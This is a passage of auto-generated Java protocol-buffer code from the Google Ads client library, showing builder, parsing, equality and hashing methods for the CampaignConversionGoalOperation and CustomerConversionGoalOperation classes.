.computeMessageSize(1, (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v19.services.CampaignConversionGoalOperation)) { return super.equals(obj); } com.google.ads.googleads.v19.services.CampaignConversionGoalOperation other = (com.google.ads.googleads.v19.services.CampaignConversionGoalOperation) obj; if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask() .equals(other.getUpdateMask())) return false; } if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getUpdate() .equals(other.getUpdate())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } switch (operationCase_) { case 1: hash = (37 * hash) + UPDATE_FIELD_NUMBER; hash = (53 * hash) + getUpdate().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } @java.lang.Override public Builder newBuilderForType() { return newBuilder(); } public static Builder newBuilder() { return DEFAULT_INSTANCE.toBuilder(); } public static Builder newBuilder(com.google.ads.googleads.v19.services.CampaignConversionGoalOperation prototype) { return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype); } @java.lang.Override public Builder toBuilder() { return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this); } @java.lang.Override protected Builder newBuilderForType( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { Builder builder = new Builder(parent); return builder; } /** * <pre> * A single operation (update) on a campaign conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CampaignConversionGoalOperation} */ public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder> implements // @@protoc_insertion_point(builder_implements:google.ads.googleads.v19.services.CampaignConversionGoalOperation) com.google.ads.googleads.v19.services.CampaignConversionGoalOperationOrBuilder { public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CampaignConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.class, com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.Builder.class); } // Construct using com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.newBuilder() private Builder() { maybeForceBuilderInitialization(); } private Builder( com.google.protobuf.GeneratedMessageV3.BuilderParent parent) { super(parent); maybeForceBuilderInitialization(); } private void maybeForceBuilderInitialization() { if (com.google.protobuf.GeneratedMessageV3 .alwaysUseFieldBuilders) { getUpdateMaskFieldBuilder(); } } @java.lang.Override public Builder clear() { super.clear(); bitField0_ = 0; updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } if (updateBuilder_ != null) { updateBuilder_.clear(); } operationCase_ = 0; operation_ = null; return this; } @java.lang.Override public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() { return com.google.ads.googleads.v19.services.CampaignConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CampaignConversionGoalOperation_descriptor; } @java.lang.Override public com.google.ads.googleads.v19.services.CampaignConversionGoalOperation getDefaultInstanceForType() { return com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.getDefaultInstance(); } @java.lang.Override public com.google.ads.googleads.v19.services.CampaignConversionGoalOperation build() { com.google.ads.googleads.v19.services.CampaignConversionGoalOperation result = buildPartial(); if (!result.isInitialized()) { throw newUninitializedMessageException(result); } return result; } @java.lang.Override public com.google.ads.googleads.v19.services.CampaignConversionGoalOperation buildPartial() { com.google.ads.googleads.v19.services.CampaignConversionGoalOperation result = new com.google.ads.googleads.v19.services.CampaignConversionGoalOperation(this); if (bitField0_ != 0) { buildPartial0(result); } buildPartialOneofs(result); onBuilt(); return result; } private void buildPartial0(com.google.ads.googleads.v19.services.CampaignConversionGoalOperation result) { int from_bitField0_ = bitField0_; int to_bitField0_ = 0; if (((from_bitField0_ & 0x00000001) != 0)) { result.updateMask_ = updateMaskBuilder_ == null ? updateMask_ : updateMaskBuilder_.build(); to_bitField0_ |= 0x00000001; } result.bitField0_ |= to_bitField0_; } private void buildPartialOneofs(com.google.ads.googleads.v19.services.CampaignConversionGoalOperation result) { result.operationCase_ = operationCase_; result.operation_ = this.operation_; if (operationCase_ == 1 && updateBuilder_ != null) { result.operation_ = updateBuilder_.build(); } } @java.lang.Override public Builder clone() { return super.clone(); } @java.lang.Override public Builder setField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.setField(field, value); } @java.lang.Override public Builder clearField( com.google.protobuf.Descriptors.FieldDescriptor field) { return super.clearField(field); } @java.lang.Override public Builder clearOneof( com.google.protobuf.Descriptors.OneofDescriptor oneof) { return super.clearOneof(oneof); } @java.lang.Override public Builder setRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) { return super.setRepeatedField(field, index, value); } @java.lang.Override public Builder addRepeatedField( com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) { return super.addRepeatedField(field, value); } @java.lang.Override public Builder mergeFrom(com.google.protobuf.Message other) { if (other instanceof com.google.ads.googleads.v19.services.CampaignConversionGoalOperation) { return mergeFrom((com.google.ads.googleads.v19.services.CampaignConversionGoalOperation)other); } else { super.mergeFrom(other); return this; } } public Builder mergeFrom(com.google.ads.googleads.v19.services.CampaignConversionGoalOperation other) { if (other == com.google.ads.googleads.v19.services.CampaignConversionGoalOperation.getDefaultInstance()) return this; if (other.hasUpdateMask()) { mergeUpdateMask(other.getUpdateMask()); } switch (other.getOperationCase()) { case UPDATE: { mergeUpdate(other.getUpdate()); break; } case OPERATION_NOT_SET: { break; } } this.mergeUnknownFields(other.getUnknownFields()); onChanged(); return this; } @java.lang.Override public final boolean isInitialized() { return true; } @java.lang.Override public Builder mergeFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { if (extensionRegistry == null) { throw new java.lang.NullPointerException(); } try { boolean done = false; while (!done) { int tag = input.readTag(); switch (tag) { case 0: done = true; break; case 10: { input.readMessage( getUpdateFieldBuilder().getBuilder(), extensionRegistry); operationCase_ = 1; break; } // case 10 case 18: { input.readMessage( getUpdateMaskFieldBuilder().getBuilder(), extensionRegistry); bitField0_ |= 0x00000001; break; } // case 18 default: { if (!super.parseUnknownField(input, extensionRegistry, tag)) { done = true; // was an endgroup tag } break; } // default: } // switch (tag) } // while (!done) } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.unwrapIOException(); } finally { onChanged(); } // finally return this; } private int operationCase_ = 0; private java.lang.Object operation_; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public Builder clearOperation() { operationCase_ = 0; operation_ = null; onChanged(); return this; } private int bitField0_; private com.google.protobuf.FieldMask updateMask_; private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> updateMaskBuilder_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ public com.google.protobuf.FieldMask getUpdateMask() { if (updateMaskBuilder_ == null) { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } else { return updateMaskBuilder_.getMessage(); } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (value == null) { throw new NullPointerException(); } updateMask_ = value; } else { updateMaskBuilder_.setMessage(value); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder setUpdateMask( com.google.protobuf.FieldMask.Builder builderForValue) { if (updateMaskBuilder_ == null) { updateMask_ = builderForValue.build(); } else { updateMaskBuilder_.setMessage(builderForValue.build()); } bitField0_ |= 0x00000001; onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder mergeUpdateMask(com.google.protobuf.FieldMask value) { if (updateMaskBuilder_ == null) { if (((bitField0_ & 0x00000001) != 0) && updateMask_ != null && updateMask_ != com.google.protobuf.FieldMask.getDefaultInstance()) { getUpdateMaskBuilder().mergeFrom(value); } else { updateMask_ = value; } } else { updateMaskBuilder_.mergeFrom(value); } if (updateMask_ != null) { bitField0_ |= 0x00000001; onChanged(); } return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public Builder clearUpdateMask() { bitField0_ = (bitField0_ & ~0x00000001); updateMask_ = null; if (updateMaskBuilder_ != null) { updateMaskBuilder_.dispose(); updateMaskBuilder_ = null; } onChanged(); return this; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMask.Builder getUpdateMaskBuilder() { bitField0_ |= 0x00000001; onChanged(); return getUpdateMaskFieldBuilder().getBuilder(); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { if (updateMaskBuilder_ != null) { return updateMaskBuilder_.getMessageOrBuilder(); } else { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder> getUpdateMaskFieldBuilder() { if (updateMaskBuilder_ == null) { updateMaskBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.protobuf.FieldMask, com.google.protobuf.FieldMask.Builder, com.google.protobuf.FieldMaskOrBuilder>( getUpdateMask(), getParentForChildren(), isClean()); updateMask_ = null; } return updateMaskBuilder_; } private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CampaignConversionGoal, com.google.ads.googleads.v19.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v19.resources.CampaignConversionGoalOrBuilder> updateBuilder_; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v19.resources.CampaignConversionGoal getUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } else { if (operationCase_ == 1) { return updateBuilder_.getMessage(); } return com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ public Builder setUpdate(com.google.ads.googleads.v19.resources.CampaignConversionGoal value) { if (updateBuilder_ == null) { if (value == null) { throw new NullPointerException(); } operation_ = value; onChanged(); } else { updateBuilder_.setMessage(value); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ public Builder setUpdate( com.google.ads.googleads.v19.resources.CampaignConversionGoal.Builder builderForValue) { if (updateBuilder_ == null) { operation_ = builderForValue.build(); onChanged(); } else { updateBuilder_.setMessage(builderForValue.build()); } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ public Builder mergeUpdate(com.google.ads.googleads.v19.resources.CampaignConversionGoal value) { if (updateBuilder_ == null) { if (operationCase_ == 1 && operation_ != com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance()) { operation_ = com.google.ads.googleads.v19.resources.CampaignConversionGoal.newBuilder((com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_) .mergeFrom(value).buildPartial(); } else { operation_ = value; } onChanged(); } else { if (operationCase_ == 1) { updateBuilder_.mergeFrom(value); } else { updateBuilder_.setMessage(value); } } operationCase_ = 1; return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ public Builder clearUpdate() { if (updateBuilder_ == null) { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; onChanged(); } } else { if (operationCase_ == 1) { operationCase_ = 0; operation_ = null; } updateBuilder_.clear(); } return this; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ public com.google.ads.googleads.v19.resources.CampaignConversionGoal.Builder getUpdateBuilder() { return getUpdateFieldBuilder().getBuilder(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.CampaignConversionGoalOrBuilder getUpdateOrBuilder() { if ((operationCase_ == 1) && (updateBuilder_ != null)) { return updateBuilder_.getMessageOrBuilder(); } else { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CampaignConversionGoal update = 1;</code> */ private com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CampaignConversionGoal, com.google.ads.googleads.v19.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v19.resources.CampaignConversionGoalOrBuilder> getUpdateFieldBuilder() { if (updateBuilder_ == null) { if (!(operationCase_ == 1)) { operation_ = com.google.ads.googleads.v19.resources.CampaignConversionGoal.getDefaultInstance(); } updateBuilder_ = new com.google.protobuf.SingleFieldBuilderV3< com.google.ads.googleads.v19.resources.CampaignConversionGoal, com.google.ads.googleads.v19.resources.CampaignConversionGoal.Builder, com.google.ads.googleads.v19.resources.CampaignConversionGoalOrBuilder>( (com.google.ads.googleads.v19.resources.CampaignConversionGoal) operation_, getParentForChildren(), isClean()); operation_ = null; } operationCase_ = 1; onChanged(); return updateBuilder_; } @java.lang.Override public final Builder setUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.setUnknownFields(unknownFields); } @java.lang.Override public final Builder mergeUnknownFields( final com.google.protobuf.UnknownFieldSet unknownFields) { return super.mergeUnknownFields(unknownFields); } // @@protoc_insertion_point(builder_scope:google.ads.googleads.v19.services.CampaignConversionGoalOperation) } // @@protoc_insertion_point(class_scope:google.ads.googleads.v19.services.CampaignConversionGoalOperation) private static final com.google.ads.googleads.v19.services.CampaignConversionGoalOperation DEFAULT_INSTANCE; static { DEFAULT_INSTANCE = new com.google.ads.googleads.v19.services.CampaignConversionGoalOperation(); } public static com.google.ads.googleads.v19.services.CampaignConversionGoalOperation getDefaultInstance() { return DEFAULT_INSTANCE; } private static final com.google.protobuf.Parser<CampaignConversionGoalOperation> PARSER = new com.google.protobuf.AbstractParser<CampaignConversionGoalOperation>() { @java.lang.Override public CampaignConversionGoalOperation parsePartialFrom( com.google.protobuf.CodedInputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { Builder builder = newBuilder(); try { builder.mergeFrom(input, extensionRegistry); } catch (com.google.protobuf.InvalidProtocolBufferException e) { throw e.setUnfinishedMessage(builder.buildPartial()); } catch (com.google.protobuf.UninitializedMessageException e) { throw e.asInvalidProtocolBufferException().setUnfinishedMessage(builder.buildPartial()); } catch (java.io.IOException e) { throw new com.google.protobuf.InvalidProtocolBufferException(e) .setUnfinishedMessage(builder.buildPartial()); } return builder.buildPartial(); } }; public static com.google.protobuf.Parser<CampaignConversionGoalOperation> parser() { return PARSER; } @java.lang.Override public com.google.protobuf.Parser<CampaignConversionGoalOperation> getParserForType() { return PARSER; } @java.lang.Override public com.google.ads.googleads.v19.services.CampaignConversionGoalOperation getDefaultInstanceForType() { return DEFAULT_INSTANCE; } }
googleads/google-ads-java
35,941
google-ads-stubs-v19/src/main/java/com/google/ads/googleads/v19/services/CustomerConversionGoalOperation.java
// Generated by the protocol buffer compiler. DO NOT EDIT! // source: google/ads/googleads/v19/services/customer_conversion_goal_service.proto // Protobuf Java Version: 3.25.7 package com.google.ads.googleads.v19.services; /** * <pre> * A single operation (update) on a customer conversion goal. * </pre> * * Protobuf type {@code google.ads.googleads.v19.services.CustomerConversionGoalOperation} */ public final class CustomerConversionGoalOperation extends com.google.protobuf.GeneratedMessageV3 implements // @@protoc_insertion_point(message_implements:google.ads.googleads.v19.services.CustomerConversionGoalOperation) CustomerConversionGoalOperationOrBuilder { private static final long serialVersionUID = 0L; // Use CustomerConversionGoalOperation.newBuilder() to construct. private CustomerConversionGoalOperation(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) { super(builder); } private CustomerConversionGoalOperation() { } @java.lang.Override @SuppressWarnings({"unused"}) protected java.lang.Object newInstance( UnusedPrivateParameter unused) { return new CustomerConversionGoalOperation(); } public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() { return com.google.ads.googleads.v19.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CustomerConversionGoalOperation_descriptor; } @java.lang.Override protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable internalGetFieldAccessorTable() { return com.google.ads.googleads.v19.services.CustomerConversionGoalServiceProto.internal_static_google_ads_googleads_v19_services_CustomerConversionGoalOperation_fieldAccessorTable .ensureFieldAccessorsInitialized( com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.class, com.google.ads.googleads.v19.services.CustomerConversionGoalOperation.Builder.class); } private int bitField0_; private int operationCase_ = 0; @SuppressWarnings("serial") private java.lang.Object operation_; public enum OperationCase implements com.google.protobuf.Internal.EnumLite, com.google.protobuf.AbstractMessage.InternalOneOfEnum { UPDATE(1), OPERATION_NOT_SET(0); private final int value; private OperationCase(int value) { this.value = value; } /** * @param value The number of the enum to look for. * @return The enum associated with the given number. * @deprecated Use {@link #forNumber(int)} instead. */ @java.lang.Deprecated public static OperationCase valueOf(int value) { return forNumber(value); } public static OperationCase forNumber(int value) { switch (value) { case 1: return UPDATE; case 0: return OPERATION_NOT_SET; default: return null; } } public int getNumber() { return this.value; } }; public OperationCase getOperationCase() { return OperationCase.forNumber( operationCase_); } public static final int UPDATE_MASK_FIELD_NUMBER = 2; private com.google.protobuf.FieldMask updateMask_; /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return Whether the updateMask field is set. */ @java.lang.Override public boolean hasUpdateMask() { return ((bitField0_ & 0x00000001) != 0); } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> * @return The updateMask. */ @java.lang.Override public com.google.protobuf.FieldMask getUpdateMask() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } /** * <pre> * FieldMask that determines which resource fields are modified in an update. * </pre> * * <code>.google.protobuf.FieldMask update_mask = 2;</code> */ @java.lang.Override public com.google.protobuf.FieldMaskOrBuilder getUpdateMaskOrBuilder() { return updateMask_ == null ? com.google.protobuf.FieldMask.getDefaultInstance() : updateMask_; } public static final int UPDATE_FIELD_NUMBER = 1; /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> * @return Whether the update field is set. */ @java.lang.Override public boolean hasUpdate() { return operationCase_ == 1; } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> * @return The update. */ @java.lang.Override public com.google.ads.googleads.v19.resources.CustomerConversionGoal getUpdate() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } /** * <pre> * Update operation: The customer conversion goal is expected to have a * valid resource name. * </pre> * * <code>.google.ads.googleads.v19.resources.CustomerConversionGoal update = 1;</code> */ @java.lang.Override public com.google.ads.googleads.v19.resources.CustomerConversionGoalOrBuilder getUpdateOrBuilder() { if (operationCase_ == 1) { return (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_; } return com.google.ads.googleads.v19.resources.CustomerConversionGoal.getDefaultInstance(); } private byte memoizedIsInitialized = -1; @java.lang.Override public final boolean isInitialized() { byte isInitialized = memoizedIsInitialized; if (isInitialized == 1) return true; if (isInitialized == 0) return false; memoizedIsInitialized = 1; return true; } @java.lang.Override public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException { if (operationCase_ == 1) { output.writeMessage(1, (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { output.writeMessage(2, getUpdateMask()); } getUnknownFields().writeTo(output); } @java.lang.Override public int getSerializedSize() { int size = memoizedSize; if (size != -1) return size; size = 0; if (operationCase_ == 1) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(1, (com.google.ads.googleads.v19.resources.CustomerConversionGoal) operation_); } if (((bitField0_ & 0x00000001) != 0)) { size += com.google.protobuf.CodedOutputStream .computeMessageSize(2, getUpdateMask()); } size += getUnknownFields().getSerializedSize(); memoizedSize = size; return size; } @java.lang.Override public boolean equals(final java.lang.Object obj) { if (obj == this) { return true; } if (!(obj instanceof com.google.ads.googleads.v19.services.CustomerConversionGoalOperation)) { return super.equals(obj); } com.google.ads.googleads.v19.services.CustomerConversionGoalOperation other = (com.google.ads.googleads.v19.services.CustomerConversionGoalOperation) obj; if (hasUpdateMask() != other.hasUpdateMask()) return false; if (hasUpdateMask()) { if (!getUpdateMask() .equals(other.getUpdateMask())) return false; } if (!getOperationCase().equals(other.getOperationCase())) return false; switch (operationCase_) { case 1: if (!getUpdate() .equals(other.getUpdate())) return false; break; case 0: default: } if (!getUnknownFields().equals(other.getUnknownFields())) return false; return true; } @java.lang.Override public int hashCode() { if (memoizedHashCode != 0) { return memoizedHashCode; } int hash = 41; hash = (19 * hash) + getDescriptor().hashCode(); if (hasUpdateMask()) { hash = (37 * hash) + UPDATE_MASK_FIELD_NUMBER; hash = (53 * hash) + getUpdateMask().hashCode(); } switch (operationCase_) { case 1: hash = (37 * hash) + UPDATE_FIELD_NUMBER; hash = (53 * hash) + getUpdate().hashCode(); break; case 0: default: } hash = (29 * hash) + getUnknownFields().hashCode(); memoizedHashCode = hash; return hash; } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.ByteString data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.ByteString data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom(byte[] data) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws com.google.protobuf.InvalidProtocolBufferException { return PARSER.parseFrom(data, extensionRegistry); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseDelimitedFrom(java.io.InputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseDelimitedFrom( java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseDelimitedWithIOException(PARSER, input, extensionRegistry); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input) throws java.io.IOException { return com.google.protobuf.GeneratedMessageV3 .parseWithIOException(PARSER, input); } public static com.google.ads.googleads.v19.services.CustomerConversionGoalOperation parseFrom( com.google.protobuf.CodedInputStream input, 